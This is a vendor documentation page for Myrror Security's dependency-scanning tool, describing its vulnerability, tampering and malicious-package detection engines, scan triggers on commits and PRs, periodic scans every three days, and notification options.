π Scan Types and Frequency
Scan Types Supported by Myrror Security
Myrror's SCA tool offers a range of scan types and options, catering to the diverse needs of developers. It allows for the selection of analysis engines and the setting of various parameters to tailor the tool to the environment.
Vulnerability Detection Engine
This engine detects vulnerabilities within the applicationβs codebase through reachability analysis, prioritizing those that are publicly disclosed. It assesses the impact of these vulnerabilities on the application and provides detailed reports for resolution.
Tampering Detection Engine
Part of the supply chain attack detection suite, this engine identifies tampering in external dependencies, such as code injections. It ensures that dependencies shipped from external sources arrive at the production environment untampered by analyzing the compiled binaries from repositories and comparing them against the source code to detect any unauthorized code.
Malicious Packages Detection Engine
This engine identifies packages built with inherent vulnerabilities, including novel security threats. It uses trained machine learning models to detect signatures and code patterns that indicate malicious intent.
Developers can configure Myrror to utilize all engines or select specific ones based on their requirements.
Scan Frequency
On Commit and PRs to Specific Branches
Scans are conducted on each PR or commit to selected branches, particularly beneficial for organizations using feature branches. Scans can be set for any branch, typically the main branch, with configurable actions for PRs that contain dependencies with security issues, such as notifications or blocks.
Periodic Scans
When no changes are made on the SCM platform, Myrror can perform periodic scans as needed. By default, scans are set every three days to align with the typical update frequency of CVEs, ensuring the application's security posture remains current.
Notifications
Developers can configure notifications based on their specific needs, whether for supply chain attack detection, the discovery of critical vulnerabilities, or opting for no notifications if preferred.